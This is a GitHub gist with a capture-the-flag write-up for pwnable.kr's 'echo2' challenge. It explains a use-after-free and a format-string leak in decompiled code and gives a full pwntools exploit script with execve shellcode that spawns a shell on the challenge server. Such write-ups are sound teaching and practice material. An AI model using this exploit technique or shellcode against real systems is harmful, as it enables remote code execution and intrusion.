Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Pwnable.kr echo2 writeup

Pwnable.kr echo2 writeup

ihciah@gmail.com

FSB and UAF is used in this simple problem.

Let's have a look at it.

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int *v3; // rsi@1
  _QWORD *v4; // rax@1
  int v6; // [sp+Ch] [bp-24h]@1
  _QWORD v7[4]; // [sp+10h] [bp-20h]@1

  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  o = malloc(40uLL);
  *((_QWORD *)o + 3) = greetings;
  *((_QWORD *)o + 4) = byebye;
  printf("hey, what's your name? : ", 0LL);
  v3 = (int *)v7;
  __isoc99_scanf("%24s", v7);
  v4 = o;
  *(_QWORD *)o = v7[0];
  v4[1] = v7[1];
  v4[2] = v7[2];
  id = v7[0];
  getchar();
  func[0] = (__int64)echo1;
  func_1_ = (__int64)echo2;
  func_2_ = (__int64)echo3;
  v6 = 0;
  do
  {
    while ( 1 )
    {
      while ( 1 )
      {
        puts("\n- select echo type -");
        puts("- 1. : BOF echo");
        puts("- 2. : FSB echo");
        puts("- 3. : UAF echo");
        puts("- 4. : exit");
        printf("> ", v3);
        v3 = &v6;
        __isoc99_scanf("%d", &v6);
        getchar();
        if ( (unsigned int)v6 > 3 )
          break;
        ((void (__fastcall *)(const char *, int *))func[(unsigned __int64)(unsigned int)(v6 - 1)])("%d", &v6);
      }
      if ( v6 == 4 )
        break;
      puts("invalid menu");
    }
    cleanup();
    printf("Are you sure you want to exit? (y/n)", &v6);
    v6 = getchar();
  }
  while ( v6 != 121 );
  puts("bye");
  return 0;
}

When cleanup, it does free(o). At this time, if you press 4 to exit and cancel then, o is freed but it will be used in the following step when you press 2.

In echo3, it malloc(32) whose size is small enough to fetch the same block freed by cleanup. We can use it to modify the address of greetings(o+3*8).

Since the NX is disabled, our shellcode can be written in name, then we can leak it's address through FSB. After that, just overwrite greetings and trigger it to get a shell.

# shellcode: https://www.exploit-db.com/exploits/36858/
# ihciah@gmail.com
from pwn import *
shellcode="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56"
shellcode+="\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
leak="%10$p"
#sh=process("/home/c/ctf/echo2")
sh=remote("pwnable.kr",9011)
sh.recvuntil(":")
sh.sendline(shellcode)
print sh.recvuntil("> ")
sh.sendline("2")
sh.recvline()
sh.sendline(leak)
addr=sh.recvline().strip()
assert(addr.startswith("0x"))
name=int(addr,16)-0x20
sh.recvuntil(">")
sh.sendline("4")
sh.sendline("n")
sh.recvuntil(">")
sh.sendline("3")
sh.recvline()
sh.sendline("A"*24+p64(name))
sh.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.